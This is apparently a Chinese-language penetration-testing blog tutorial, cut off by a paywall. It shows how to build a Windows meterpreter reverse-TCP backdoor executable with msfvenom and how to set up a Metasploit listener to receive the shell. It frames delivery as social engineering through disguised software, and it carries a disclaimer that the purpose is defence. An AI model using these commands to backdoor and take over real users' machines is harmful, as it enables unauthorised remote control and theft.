本文介绍了MSF(MetasploitFramework)如何生成Windows恶意软件后门,以及CobaltStrike这款渗透测试工具的使用方法,包括其功能如payload生成、C/S架构的服务器管理和客户端操作。
MSF恶意程序利用+CS上线
PC端恶意程序利用
后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为
思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell
制作Windows恶意软件获取shell
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件。
实验内容:
制作Windows恶意软件获取shell
msfvenom的shell在windows中的使用 msfvenom生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.188.39LPORT=6060 -f exe > nice.exe
-p 添加载荷payload。
-f 输出文件格式
启动metaspliot msfconsole
metasploit设置侦听
msf > use exploit/multi/handler
#加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
#设置payload
msf exploit(multi/handler) > set lhost kali的ip
#设置kali的IP
msf exploit(multi/handler) > set lport 6060
#设置kali的端口lport =6060
msf exploit (multi/handler) > exploit 或者 run -j
#执行
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
